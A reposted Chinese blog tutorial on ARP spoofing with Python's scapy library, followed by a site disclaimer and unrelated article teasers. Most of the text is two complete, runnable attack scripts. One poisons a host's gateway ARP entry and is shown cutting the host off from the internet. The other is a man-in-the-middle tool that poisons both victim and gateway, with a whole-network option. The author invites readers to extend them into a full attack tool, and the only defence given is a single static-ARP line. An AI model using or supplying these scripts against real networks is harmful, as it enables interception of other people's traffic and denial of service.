python网站攻击脚本_Python scapy 实现一个简易 arp 攻击脚本

scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

scapy的安装在Linux非常便利,但在Windows下比较复杂。

以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。

scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:

sudo pip3 install scapy-python3

以下是一个非常简单的arp攻击演示脚本,该脚本可以在实验环境下帮助你理解arp协议的作用和原理,当然你甚至可以扩充该脚本去编写一个完整的arp攻击工具。

#!/usr/bin/python3

# -*- coding: utf-8 -*-

# ARP攻击演示脚本/arpDemo.py

from scapy.all import (

Ether,

ARP,

sendp

)

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# Ether用来构建以太网数据包

eth = Ether()

arp = ARP(

# 代表ARP请求或者响应

op="is-at",

# 发送方Mac地址/毒化记录中的MAC

hwsrc="08:00:27:97:d1:f5",

# 发送方IP地址/毒化记录中的IP

psrc="192.168.31.1",

# 目标Mac地址/被欺骗主机MAC

hwdst="2C:56:DC:D3:AB:DB",

# 目标IP地址/被欺骗主机IP地址

pdst="192.168.31.248"

# 意思就是告诉192.168.31.248这个地址的主机,IP为192.168.31.100的主机MAC地址是08:00:27:97:d1:f5

# 如果不写目标主机的IP和MAC则默认以广播的形式发送

)

# scapy重载了"/"操作符,可以用来表示两个协议层的组合

# 这里我们输出一下数据包的结构信息

print((eth/arp).show())

# 发送封包,并且每间隔1秒重复发送

sendp(eth/arp, inter=2, loop=1)

攻击前我们在主机上看一下arp缓存的记录

arp -a

960

攻击前的arp缓存记录

执行脚本:

sudo python3 arpDemo.py

960

攻击后的arp缓存记录

这里我们是对主机的网关记录进行篡改,在执行了攻击脚本后主机已经无法正常访问互联网了。

如果你要防范这种攻击也很简单,直接将IP和MAC地址的关系绑定写入arp缓存即可。

在windows你可以通过arp命令完成,Linux下与此操作相似。

#添加静态项

arp -s 192.168.31.1 64-09-80-04-aa-c3

下面是一个更加复杂的中间人攻击脚本范例

你可以进一步的去完善它

#!/usr/bin/python3

# -*- coding: utf-8 -*-

'''

ARP 攻击脚本

'''

import argparse

import threading

import time

from scapy.all import ARP, Ether, get_if_hwaddr, sendp

from scapy.layers.l2 import getmacbyip

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# getmacbyip方法用于通过ip获取mac地址

# get_if_hwaddr方法获取指定网卡的mac地址

defget_mac(tgt_ip):

'''

调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。

'''

tgt_mac = getmacbyip(tgt_ip)

if tgt_mac is not None:

return tgt_mac

else:

print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活"%tgt_ip)

defcreate_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip):

'''

生成ARP数据包,伪造网关欺骗目标计算机

src_mac:本机的MAC地址,充当中间人

tgt_mac:目标计算机的MAC

gateway_ip:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击

tgt_ip:目标计算机的IP

op=is-at,表示ARP响应

'''

eth = Ether(src=src_mac, dst=tgt_mac)

arp = ARP(hwsrc=src_mac, psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at")

pkt = eth / arp

return pkt

defcreate_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip):

'''

生成ARP数据包,伪造目标计算机欺骗网关

src_mac:本机的MAC地址,充当中间人

gateway_mac:网关的MAC

tgt_ip:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击

gateway_ip:网关的IP

op=is-at,表示ARP响应

'''

eth = Ether(src=src_mac, dst=gateway_mac)

arp = ARP(hwsrc=src_mac, psrc=tgt_ip, hwdst=gateway_mac, pdst=gateway_ip, op="is-at")

pkt = eth / arp

return pkt

defmain():

"""

主方法

"""

description = "ARP攻击脚本"

parser = argparse.ArgumentParser(description=description)

parser.add_argument('-sm', dest='srcmac', type=str, help='发送源计算机的MAC,如果不提供,默认将采用本机的MAC地址')

parser.add_argument('-t', dest='targetip', type=str, help='指定目标计算机IP', required=True)

parser.add_argument('-tm', dest='targetmac', type=str, help='指定目标计算机MAC,如果不提供,默认将根据其IP获取MAC地址')

parser.add_argument('-g', dest='gatewayip', type=str, help='指定网关IP', required=True)

parser.add_argument('-gm', dest='gatewaymac', type=str, help='指定网关MAC,如果不提供,默认将根据其IP获取MAC地址')

parser.add_argument('-i', dest='interface', type=str, help='指定使用的网卡', required=True)

parser.add_argument('-a', dest='allarp', action='store_true', help='是否进行全网arp欺骗')

args = parser.parse_args()

tgt_ip = args.targetip

gateway_ip = args.gatewayip

interface = args.interface

srcmac = args.srcmac

targetmac = args.targetmac

gatewaymac = args.gatewaymac

if tgt_ip is None or gateway_ip is None or interface is None:

print(parser.print_help())

exit(0)

src_mac = srcmac

if src_mac is None:

src_mac = get_if_hwaddr(interface)

print('本机MAC地址是:', src_mac)

print("目标计算机IP地址是:", tgt_ip)

tgt_mac = targetmac

if tgt_mac is None:

tgt_mac = get_mac(tgt_ip)

print("目标计算机MAC地址是:", tgt_mac)

print("网关IP地址是:", gateway_ip)

gateway_mac = gatewaymac

if gateway_mac is None:

gateway_mac = get_mac(gateway_ip)

print("网关MAC地址是:", gateway_mac)

input('按任意键继续:')

pkt_station = create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip)

pkt_gateway = create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip)

# 如果不展示发送情况的话下面的语句可以更加简便直接用sendp方法提供的功能循环发送即可,不需要多线程和死循环。

# sendp(pkt_station, inter=1, loop=1)

# sendp(pkt_gateway, inter=1, loop=1)

i = 1

while True:

t = threading.Thread(

target=sendp,

args=(pkt_station,),

kwargs={'inter':1, 'iface':interface}

)

t.start()

t.join()

print(str(i) + " [*]发送一个计算机ARP欺骗包")

s = threading.Thread(

target=sendp,

args=(pkt_gateway,),

kwargs={'inter':1, 'iface':interface}

)

s.start()

s.join()

print(str(i) + " [*]发送一个网关ARP欺骗包")

i += 1

time.sleep(1)

if __name__ == '__main__':

main()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/476693.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

导师课题组人少,一个人攻克一个方向是什么体验?

CSer发一篇顶会一作有多难?没写论文前,一直认为搞科研不着急,压根就没有把论文这件事放在心上。研一的时候进课题组,导师说要开拓新的方向,于是成了实验室第一个吃螃蟹的人,日常也没有人可以寻求指导。那时…

SQL Server定期自动备份

SQL Server定期自动备份企业管理器中的Tools,Database Maintenance Planner,可以设置数据库的定期自动备份计划。并通过启动Sql server Agent来自动运行备份计划。具体步骤如下:1、打开企业管理器,在控制台根目录中依次点开Microsoft SQL Ser…

监督学习方法总结

文章目录1. 适用问题2. 模型2.1 概率模型、非概率模型2.2 判别方法、生成方法2.3 特征空间2.4 线性、非线性模型3. 学习策略4. 学习算法1. 适用问题 监督学习:学习一个模型,使它能对给定的输入预测相应的输出。包括分类、标注、回归。 分类问题&#x…

rabbitmq使用_Spring Boot中使用RabbitMQ

Message Broker与AMQP简介Message Broker是一种消息验证、传输、路由的架构模式,其设计目标主要应用于下面这些场景:消息路由到一个或多个目的地消息转化为其他的表现方式执行消息的聚集、消息的分解,并将结果发送到他们的目的地,…

注意力无用?Apple新作:注意力替换成常数矩阵,效果差异不大

文|萧箫 发自 凹非寺源|量子位要说Transformer的核心亮点,当然是注意力机制了。但现在,一篇新研究却突然提出了带点火药味的观点:注意力机制对于预训练Transformer有多重要,这事儿得打个问号。研究人员来自…

windows服务编程 注册InstallUtil.exe

dos命令下输入; C:\Windows\Microsoft.Net\Framework\v2.0.to727>InstallUtil.exe E:\Test\WindowsServiec1.exe 删除: C:\Windows\Microsoft.Net\Framework\v2.0.to727>InstallUtil.exe/u E:\Test\WindowsServiec1.exe 转载于:https://www.cnblogs.com/lgzh3/archive/2…

LeetCode 5. 最长回文子串(动态规划)

文章目录1. 题目2. 解题2.1 自己写的DP2.2 优化后的DP2.3 中心扩展法1. 题目 给定一个字符串 s,找到 s 中最长的回文子串。你可以假设 s 的最大长度为 1000。 示例 1: 输入: "babad" 输出: "bab" 注意: "aba" 也是一个有…

springboot整合kafka_springboot整合kafka实现消息的发送消费

如下是springboot整合kafka的一个案例,方便需要的小伙伴。启动kafka Servercd 到kafka的bin目录下:前提是启动zk./kafka-server-start.sh /Users/hz/programs/kafka_2.12-2.2.1/config/server.properties &kafka创建topic:kafka-topics.sh --create …

关于如何在BCB中使用CodeGuard

关于如何在BCB中使用CodeGuard点击数:231 录入时间:2007-6-7 一、 为什么写这篇东西 自己在使用 BCB5 写一些程序时需要检查很多东西,例如内存泄漏、资源是否有释放等等,在使用了很多工具后,发觉 BCB5 本…

港大腾讯提出DiffusionDet:第一个用于目标检测的扩散模型

编|杜伟、陈萍源|机器之心扩散模型不但在生成任务上非常成功,这次在目标检测任务上,更是超越了成熟的目标检测器。扩散模型( Diffusion Model )作为深度生成模型中的新 SOTA,已然在图像生成任务…

无监督学习概论

文章目录1. 无监督学习基本原理2. 基本问题2.1 聚类 Clustering2.2 降维 Dimensionality Reduction2.3 概率模型估计3. 机器学习三要素4. 无监督学习方法4.1 聚类4.2 降维4.3 话题分析4.4 图分析1. 无监督学习基本原理 机器学习或统计学习一般包括监督学习、无监督学习、强化学…

python xlrd使用_python处理Excel xlrd的简单使用

xlrd主要用于读取Excel文件,本文为大家分享了python处理Excel的具体代码,供大家参考,具体内容如下 安装 pip install xlrd api使用 import xlrd # 打开Excel文件读取数据 workbook xlrd.open_workbook(a.xlsx); # 打印所有的sheet列出所有的…

学习Duwamish7的MSDN说明及相关技术策略

(一).MSDN对Duwamish7的说明   Duwamish 7.0 是由 MSDN 开发的通用 Duwamish 系列应用程序的功能性端口(完全使用 .NET 技术)。尽管示例本身是围绕虚拟网上书店建立的,但本示例主要关注的方面却是性能,与…

程序员面试金典 - 面试题 17.08. 马戏团人塔(最长上升子序 DP/二分查找)

文章目录1. 题目2. 解题2.1 超时解2.2 二分查找1. 题目 有个马戏团正在设计叠罗汉的表演节目,一个人要站在另一人的肩膀上。出于实际和美观的考虑,在上面的人要比下面的人矮一点且轻一点。 已知马戏团每个人的身高和体重,请编写代码计算叠罗…

海洋分享lol皮肤插件_LOL战斗之夜客户端BUG频出服务器爆满!如何提前领取皮肤?...

Hello大家好,我是Taker!昨天的战斗之夜,小编可是单排奋战了一整晚~排位段位和箱子积分都定格在了钻石,不知道各位如何呢?(^o^)/~今天终于到了收获的日子了!之前我们打的积分所获得的皮肤箱子今天就可以打开…

socket异步处理问题

由于一个项目要和第三方软件做接口,第三方软件是Unix的操作系统,所以用了Socket来传输数据。具体结构是这样的:本项目作为服务器端,第三方软件是客户端,并且有多个客户端。通常情况下,要开多个线程来处理多…

2022爆火的AIGC,能给AI续命吗

文 | 陈彩娴源 | AI科技评论生产力如已成熟,想象力还会远吗?“你们是从什么时候开始注意到人类的?”“当第一个原始人开始仰望星空的时候。”AI 的类人猿,早已开始仰望人类。来自机器的审视在过去短短的两年间,算法从业…

LeetCode 354. 俄罗斯套娃信封问题(最长上升子序 DP/二分查找)

1. 题目 给定一些标记了宽度和高度的信封,宽度和高度以整数对形式 (w, h) 出现。 当另一个信封的宽度和高度都比这个信封大的时候,这个信封就可以放进另一个信封里,如同俄罗斯套娃一样。 请计算最多能有多少个信封能组成一组“俄罗斯套娃”…

python语言语句块标记是_Python的基本语法——语句块

1.语句块是在条件为真(条件语句)时执行或者执行多次(循环语句)的一组语句; 2在代码前放置空格来缩进语句即可创建语句块,语句块中的每行必须是同样的缩进量; 3.缩进:Python开发者有意…

[导入]设计模式初学者系列-工厂方法

摘要: 闲谈工厂方法 设计模式系列到了第四篇了,如果还不谈谈工厂方法设计模式就太对不起GoF了,为什么有如此一说?实际上工厂方法模式是好些模式的基石,她们或多或少的使用了工厂方法模式或以工厂方法为模型。 工厂方法模式是一种类…